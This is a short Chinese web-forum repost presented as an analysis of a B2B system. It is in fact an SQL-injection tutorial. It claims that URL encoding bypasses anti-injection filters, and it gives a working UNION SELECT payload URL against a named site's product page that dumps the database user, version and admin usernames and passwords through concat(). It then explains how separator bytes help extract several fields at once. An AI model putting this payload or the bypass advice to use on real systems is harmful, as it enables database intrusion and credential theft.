日期:2011-07-06 17:40:00 来源:本站整理
对B2B系统的解析[网络技术]
本文“对B2B系统的解析[网络技术]”是由七道奇为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:
用PHP的str_replace(array("\r\n,"\n"," "),array("<br>","<br>"," "),$_POST[''questiondes]),这种过滤关于跨站没有任何作用,可以用htmlspecialchars,htmentite来过滤;关于防注入程序,我们可以用URL编码来绕过的;
一个最简单的concat:
看这里http://www.110hack.com/product_info.php?id=33+and+1=2+union+select+1,concat(0x757365723A,user(),0x5c,0x64617461626173653A,database(),0x5c,0x64617461626173652076657273696F6E3A,version()),3,4,5,concat(username,0x5c,password)+from+admin
先看2号显示位,concat(database(),0x5c,user(),0x5c,version())
当我们查询很多个东西的时刻,我们便可以用到concat,普通用在显示位只有一个的情形,假如直接把显示位上放上要查询的东西,一次只能查询一个,这样很麻烦,所以这个concat就有了用武之地,把几个东西结合起来.不管你查询语句是什么,都可以用concat套进去,简单的理解可以当作一种等级关系?反正理解不了的话可以这么看,hex()的括号可以括全部的东西,concat()的括号可以括别的东西.
不过concat有个缺陷就是结合起来查的东西都是不被分割的,也就是连成一片的,我们需求用特定标识来脱离,比方0x5f、0x5c、0xff等等
以上是“对B2B系统的解析[网络技术]”的内容,如果你对以上该文章内容感兴趣,你可以看看七道奇为您推荐以下文章:
本文地址: | 与您的QQ/BBS好友分享! |
评论内容只代表网友观点,与本站立场无关!
评论摘要(共 0 条,得分 0 分,平均 0 分)
查看完整评论